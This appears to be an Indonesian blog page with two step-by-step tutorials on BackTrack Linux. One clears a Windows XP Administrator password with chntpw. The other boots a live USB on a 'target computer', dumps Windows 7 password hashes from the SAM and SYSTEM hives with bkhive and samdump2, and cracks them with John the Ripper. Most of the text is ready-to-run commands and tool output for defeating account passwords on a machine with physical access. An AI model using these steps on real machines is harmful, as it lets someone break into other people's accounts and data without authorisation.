Posts Tagged ‘ backtrack ’

Reset Password Windows Menggunakan chntpw di Backtrack

Ada sangat banyak cara untuk me-reset password Windows, salah satunya adalah langkah berikut. Langkah tersebut untuk mereset atau menghilangkan password pada WIndows XP. Langsung saja, Boot Backtrack anda (Bisa pake Live USB atau Live CD). Masuk ke konsole. Kita akan menggunakan tool chntpw yang terletak di /pentest/password/chntpw. Sedangkan letak password Windows di [mount point]/WINDOWS/system32/config/SAM.
Pada contoh dibawah kita akan mereset password Administrator dan “Mount point”dimisalkan terletak “/mnt/sda1”.
Lanjutkan…! Setelah buka konsole, ketik :

cd /pentest/password/
chntpw -u Administrator /mnt/sda1/Windows/System32/config/SAM

<Output dari perintah tersebut adalah>

—- User Edit Menu:
1 – Clear (blank) user password
2 – Edit (set new) user password (careful with this on XP or Vista)
3 – Promote user (make user an administrator)
4 – Unlock and enable user account [probably locked now]
q – Quit editing user, back to user select

Select: [q] > [Ketik 1]

Password cleared!

Hives that have changed:
# Name
0 </mnt/sda1/Windows/System32/config/SAM>
Write hive files? (y/n) [n] : [Ketik y]
0 </mnt/sda1/Windows/System32/config/SAM> – OK
Selesai……..

Cracking Password Windows 7

Ini merupakan posting saya yang pertama yang membahas tentang cracking. Walaupun sebenarnya saya sudah lumayan banyak posting tentang cracking pssword di blog lama saya. Pada saat cracking ini saya menggunakan Backtrack 5 yang baru saja rilis, yang tentu saja sudah disertai dengan paket-paket powerfull yang digunakan untuk cracking dan hacking.

Disini saya menggunakan 3 buah software/aplikasi, yang semua nya berjalan pada shell/CLI. Yaitu bkhive, samdump2 dan John The Ripper (tentu saja semua aplikasi ini sudah tersedia di dalam distro BT5). Jika anda menggunakan linux selain BT5, silahkan anda instal terlebih dulu ke tiga aplikasi tersebut. BT5 yang saya gunakan adalah Live USB. Sehingga tinggal colok di komputer target dan booting via USB, dan masuk ke Bt5. Okey langsung saja.

Saya anggap anda sudah punya Backtrack 5 atau Linux distro lain yang sudah diinstall dengan bkhive, samdump2 dan John The Ripper.

Langkah awal yang harus anda lakukan adalah booting Komputer ke Backtrack. Dan masuk ke Backtrack. Sampai muncul :

root@root: ~#

Kemudian ketik :

root@root: ~# startx

Setelah itu akan muncul Desktop Backtrack 5. Setelah muncul jendela desktop, buka Shell dan lakukan mount terhadap hardisk drive C, dimana Windows 7 di install. Cara mount.

root@root: ~# mkdir /media/disk
root@root: ~# mount /dev/sda1 /media/disk

sda1 adalah hardisk (drive C:\) dimana Windows 7 terinstall, sesuaikan dengan Komputer anda. Kemudian ketik:

root@root: ~# bkhive /media/disk/Windows/System32/config/SYSTEM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM > hash.txt

File Hash password sudah dibuat, sekarang masuk ke direktori John The Ripper untuk melakukan cracking password.

root@root: ~# cd /pentest/passwords/john/
root@root: /pentest/passwords/john# john --users=Ofidz --format=NT -i=alnum /root/hash.txt
Cracking Password Win7

Cracking Password Win7

Harusnya hasil cracking seperti pada gambar diatas. Pada gambar diatas saya hanya melakukan cracking password pada satu user (Ofidz). Dan menggunakan charset alpha numeric (-i=alnum) untuk mempercepat cracking. Jika password yang akan di crack susah atau mengandung karakter selain alnum, sebaiknya parameter ini jangan dipakai. Hanya dibutuhkan waktu 56 detik untuk memecahkan password user Ofidz.

Cracking Password Win7 Tanpa Parameter Charset

Cracking Password Win7 Tanpa Parameter Charset

Tanpa charset alnum:

root@root: /pentest/passwords/john# john --users=Ofidz --format=NT /root/hash.txt

Jika tidak menggunakan parameter Charset, waktu yang dibutuhkan lebih lama lagi, yaitu 13:40. Semakin rumit dan panjang password yang di cracking, maka akan semakin lama proses cracking ini berlangsung. RAM dan Prosessor komputer juga berpengaruh pada kecepatan cracking.

%d bloggers like this: